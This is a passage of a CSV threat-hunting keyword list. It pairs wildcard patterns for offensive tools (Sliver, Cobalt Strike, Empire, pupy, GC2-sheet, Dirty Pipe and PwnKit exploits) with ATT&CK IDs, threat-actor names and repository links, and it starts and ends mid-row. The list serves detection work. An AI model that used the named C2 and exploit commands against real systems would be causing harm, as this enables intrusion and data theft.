T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*gather/ldap_query*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*gather/peass.rb*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*gather/user_hunter*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*gatherer/gatherer.py*,offensive_tool_keyword,jackdaw,Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.,T1595 T1590 T1591,TA0001 - TA0002 - TA0007 - TA0008 - TA0011,N/A,N/A,Reconnaissance,https://github.com/skelsec/jackdaw,1,1,N/A,N/A,6,532,88,2023-07-19T16:21:49Z,2019-03-27T18:36:41Z -*gato * attack*,offensive_tool_keyword,gato,GitHub Self-Hosted Runner Enumeration and Attack Tool,T1083 - T1087 - T1081,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/praetorian-inc/gato,1,0,N/A,N/A,3,263,24,2023-07-27T15:15:32Z,2023-01-06T15:43:27Z -*gato * enumerate*,offensive_tool_keyword,gato,GitHub Self-Hosted Runner Enumeration and Attack Tool,T1083 - T1087 - T1081,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/praetorian-inc/gato,1,0,N/A,N/A,3,263,24,2023-07-27T15:15:32Z,2023-01-06T15:43:27Z -*gato * --http-proxy*,offensive_tool_keyword,gato,GitHub Self-Hosted Runner Enumeration and Attack Tool,T1083 - T1087 - T1081,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/praetorian-inc/gato,1,0,N/A,N/A,3,263,24,2023-07-27T15:15:32Z,2023-01-06T15:43:27Z -*gato * --socks-proxy*,offensive_tool_keyword,gato,GitHub Self-Hosted Runner Enumeration and Attack Tool,T1083 - T1087 - T1081,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/praetorian-inc/gato,1,0,N/A,N/A,3,263,24,2023-07-27T15:15:32Z,2023-01-06T15:43:27Z -*gbfgfbopcfokdpkdigfmoeaajfmpkbnh*,greyware_tool_keyword,westwind,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*gbmdmipapolaohpinhblmcnpmmlgfgje*,greyware_tool_keyword,Unblock Websites,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*gc2-sheet.go*,offensive_tool_keyword,GC2-sheet,GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.,T1071.002 - T1560 - T1105,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/looCiprian/GC2-sheet,1,1,N/A,10,10,449,89,2023-07-06T19:22:36Z,2021-09-15T19:06:12Z -*GC2-sheet/cmd*,offensive_tool_keyword,GC2-sheet,GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.,T1071.002 - T1560 - T1105,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/looCiprian/GC2-sheet,1,1,N/A,10,10,449,89,2023-07-06T19:22:36Z,2021-09-15T19:06:12Z -*gcat*implant.py*,offensive_tool_keyword,gcat,A PoC backdoor that uses Gmail as a C&C server,T1071.001 - T1094 - T1102.002,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/byt3bl33d3r/gcat,1,1,N/A,10,10,1300,466,2018-11-16T13:43:15Z,2015-06-03T01:28:00Z -*gcat.is.the.shit@gmail.com*,offensive_tool_keyword,gcat,A PoC backdoor that uses Gmail as a C&C server,T1071.001 - T1094 - T1102.002,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/byt3bl33d3r/gcat,1,0,N/A,10,10,1300,466,2018-11-16T13:43:15Z,2015-06-03T01:28:00Z -*gcc cve_2022_0847.c -o exploit*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047,TA0001 - TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/ahrixia/CVE_2022_0847,1,0,N/A,N/A,1,21,15,2022-03-08T13:15:35Z,2022-03-08T12:43:43Z -*gcc dirtypipez.c*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1533,TA0003,N/A,N/A,Exploitation tools,https://github.com/febinrev/dirtypipez-exploit,1,0,N/A,N/A,1,41,21,2022-03-08T11:52:22Z,2022-03-08T11:49:40Z -*gci -h C:\pagefile.sys*,greyware_tool_keyword,powershell,commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.,T1047 - T1027 - T1059,TA0005 - TA0002,N/A,N/A,Discovery,https://github.com/ice-wzl/wmiexec2,1,1,N/A,9,1,10,1,2023-05-14T19:44:26Z,2023-02-07T22:10:08Z -*gcknhkkoolaabfmlnjonogaaifnjlfnp*,greyware_tool_keyword,FoxyProxy Standard,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*gconv-modules*,offensive_tool_keyword,POC,Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team,T1068,TA0004,N/A,N/A,Exploitation tools,https://github.com/Ayrx/CVE-2021-4034,1,0,N/A,N/A,1,97,16,2022-01-27T11:57:05Z,2022-01-26T03:33:47Z -*gcp_functionalc2.profile*,offensive_tool_keyword,FunctionalC2,A small POC of using Azure Functions to relay communications,T1021.006 - T1132.002 - T1071.001,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/FortyNorthSecurity/FunctionalC2,1,1,N/A,10,10,58,15,2023-03-30T20:27:38Z,2020-03-12T17:54:50Z -*GCPBucketBrute*,offensive_tool_keyword,GCPBucketBrute,A script to enumerate Google Storage buckets. determine what access you have to them. and determine if they can be privilege escalated,T1083 - T1553 - T1210 - T1213,TA0001 - TA0009 - TA0011,N/A,N/A,Exploitation tools,https://github.com/RhinoSecurityLabs/GCPBucketBrute,1,0,N/A,N/A,5,406,82,2023-05-26T19:11:42Z,2019-02-26T03:56:22Z -*GCR - Google Calendar RAT*,offensive_tool_keyword,GCR-Google-Calendar-RAT,Google Calendar RAT is a PoC of Command&Control over Google Calendar Events,T1071.001 - T1021.002 - T1059,TA0002 - TA0005,N/A,N/A,C2,https://github.com/MrSaighnal/GCR-Google-Calendar-RAT,1,1,N/A,10,10,78,15,2023-06-26T09:04:02Z,2023-06-18T13:23:31Z -*GCR-Google-Calendar-RAT*,offensive_tool_keyword,GCR-Google-Calendar-RAT,Google Calendar RAT is a PoC of Command&Control over Google Calendar Events,T1071.001 - T1021.002 - T1059,TA0002 - TA0005,N/A,N/A,C2,https://github.com/MrSaighnal/GCR-Google-Calendar-RAT,1,1,N/A,10,10,78,15,2023-06-26T09:04:02Z,2023-06-18T13:23:31Z -*geacon*/cmd/*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,1,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -*geli2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*gemailhack.py*,offensive_tool_keyword,SocialBox-Termux,SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android,T1110.001 - T1110.003 - T1078.003,TA0001 - TA0006 - TA0040,N/A,N/A,Credential Access,https://github.com/Ha3MrX/Gemail-Hack,1,1,N/A,7,9,813,385,2022-02-18T16:12:45Z,2018-04-19T13:48:41Z -*gen -f py bind --port*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*gen -f py_oneliner connect *,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*genCrossC2 *,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,0,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*genCrossC2.*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*genCrossC2.Win.exe*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*Generalrecon -noninteractive*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*generate beacon --mtls *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*generate exe Shadow*,offensive_tool_keyword,ShadowForgeC2,ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.,T1071.001 - T1569.002 - T1059.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/0xEr3bus/ShadowForgeC2,1,0,N/A,10,10,35,5,2023-07-15T11:45:36Z,2023-07-13T11:49:36Z -*generate --http http*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*generate --mtls * --os windows *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*generate --mtls * --save *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*generate payload=*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,0,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*generate --tcp-pivot *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*generate/canaries.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*generate/implants.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*generate_beacon*,offensive_tool_keyword,cobaltstrike,beacon generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/eddiezab/aggressor-scripts/tree/master,1,1,N/A,10,10,1,0,2021-01-29T21:01:58Z,2021-01-29T21:00:26Z -*generate_beanshell1*,offensive_tool_keyword,pysoserial,Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,shell spawning,https://github.com/aStrowxyu/Pysoserial,1,0,N/A,9,1,9,1,2021-12-06T07:41:55Z,2021-11-16T01:55:31Z -*generate_exploit_path_from_template*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,1,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -*generate_golden_saml*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,1,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*generate_hta operation1*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,0,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*generate_jdk8u20*,offensive_tool_keyword,pysoserial,Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,shell spawning,https://github.com/aStrowxyu/Pysoserial,1,0,N/A,9,1,9,1,2021-12-06T07:41:55Z,2021-11-16T01:55:31Z -*generate_loader_cmd*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*generate_mozillarhino1*,offensive_tool_keyword,pysoserial,Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,shell spawning,https://github.com/aStrowxyu/Pysoserial,1,0,N/A,9,1,9,1,2021-12-06T07:41:55Z,2021-11-16T01:55:31Z -*generate_mozillarhino2*,offensive_tool_keyword,pysoserial,Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,shell spawning,https://github.com/aStrowxyu/Pysoserial,1,0,N/A,9,1,9,1,2021-12-06T07:41:55Z,2021-11-16T01:55:31Z -*generate_powershell operation1*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,0,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*generate_powershell_exe*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*generate_powershell_shellcode*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*generate_python_exe*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - 